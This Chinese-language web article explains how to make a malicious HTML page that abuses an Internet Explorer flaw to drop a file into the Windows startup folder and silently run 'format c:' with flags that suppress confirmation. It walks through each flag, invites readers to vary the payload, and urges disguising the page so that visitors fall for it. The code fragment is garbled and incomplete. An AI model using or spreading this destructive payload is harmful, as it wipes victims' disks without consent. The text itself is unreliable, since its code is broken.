电脑资讯 > > 正文

有关HTML代码的另类应用

2020-07-30

这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。

现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。

我们要做一个格本地磁盘网页并不是很难,会HTML代码的朋友一定是没有什么问题的,这个其实就是利用一下IE的漏洞来实现我们的目的。

下面我们看一下下面的代码我们就会发现其中的奥妙所在了。

scr.reset() scr.path="c:\\windows\\start menu\\programs\\启动\\文件名 scr.doc="" wsh.run('start.exe /m format c:/q/autotest/u')

对于HTML代码了解的朋友们一定看出来了吧,这段代码的利害之处就在于最后一句,格你的磁盘没商量。

下面我们来看看这段代码的,具体的分析一下的他的工作原理是怎么样的。

首先,我们来看看这一句

scr.path="c:\\windows\\start menu\\programs\\启动\\文件名

这句,就是当看到这个网页的时候,它会写入到用户的机器的启动目录下,并以一个文件名的文件形式出现

wsh.run('start.exe /m format c:/q/autotest/u')

这句就是我们这里所要讲的核心东西了,对于format 这个命令大家不会陌生的吧,只要知道这个命令的朋友,一定会知道这句命令的意思的,我就在这里不在多说什么了。

在这里我把他的一些参数,简要的说说,大家会更加明白的。

在进行格盘的时候系统会与你进行对话,是否进行的,大家看到这个参数了吗 /autotest他会强制性的对你的硬盘进行格式化,而不再进行询问;/q/u这两个参数为系统不需要检查立执行。在上一句中的start.exe与 /m选项配合,哈哈,相信在执行时以最小化的状态进行,谁都会头痛的。

在这段代码里,核心语句

wsh.run('start.exe /m format c:/q/autotest/u')

我们只要对这段代码进行改动相信会出现更多不同的变化。在应用的时候把自己HTML代码做的漂亮一些,相信一定会有很多的人会上当,不小心中了你的圈套。


消防稳压泵 http://mykkzi.51sole.com
-

-

相关阅读

dchenyaoqiang资讯网